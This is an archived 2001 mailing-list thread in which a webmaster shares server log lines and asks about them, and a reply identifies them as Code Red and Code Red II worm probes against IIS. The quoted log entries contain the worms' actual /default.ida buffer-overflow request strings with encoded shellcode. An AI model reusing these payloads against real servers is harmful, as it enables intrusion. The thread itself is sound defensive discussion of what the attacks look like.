Re: log entries

by "Kathy Evans" <kje(at)vendetta.co.uk>

 Date:  Sat, 11 Aug 2001 20:19:46 +0100
 To:  "Michael Jon Muehlendorf" <haoka(at)wi.tds.net>,
"Hwg-Servers \(E-mail\)" <hwg-servers(at)hwg.org>
 References:  tds
  todo: View Thread, Original
The ones with the NNNNNs are the original code red, the XXXXXXs are code
red 2. It doesn't look as though your server is IIS, but if it is, as
long as you're patched, you're fine. It's just a nuisance. www.eeye.com
do a good explanation of the worm.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  Kathy
  http://www.vendetta.co.uk
  DNRC  Minister for Useful but Irritating Information and Trivia
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
----- Original Message -----
From: "Michael Jon Muehlendorf" <haoka(at)wi.tds.net>
To: <hwg-servers(at)hwg.org>
Sent: 11 August 2001 13:18
Subject: log entries


> Hello List!
>
> I have been getting gobs of entries in all of my server log files
thusly:
>
> <sample>
> 217.218.0.5 - - [11/Aug/2001:04:46:19 -0400] "GET
>
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
>
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNN
>
NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%
>
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 400 252 "-" "-"
> 216.181.115.144 - - [11/Aug/2001:04:53:25 -0400] "GET
>
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%
>
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 404 709 "-" "-"
> 216.88.109.82 - - [11/Aug/2001:05:22:04 -0400] "GET
>
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
>
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc
bd3%
>
u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 404 709 "-" "-"
> </sample>
>
> I've been off line for a bit, but I did read something about server
probes
> from a "CodeRedII"? Is this correct?
>
> TIA,
>
> Mike
>

HWG: hwg-servers mailing list archives, maintained by Webmasters @ IWA

This page is part of a preserved archive of archives.hwg.org. The site is no longer active and its content is not maintained. For enquiries about this archive, write to archive(at)iwanet.org.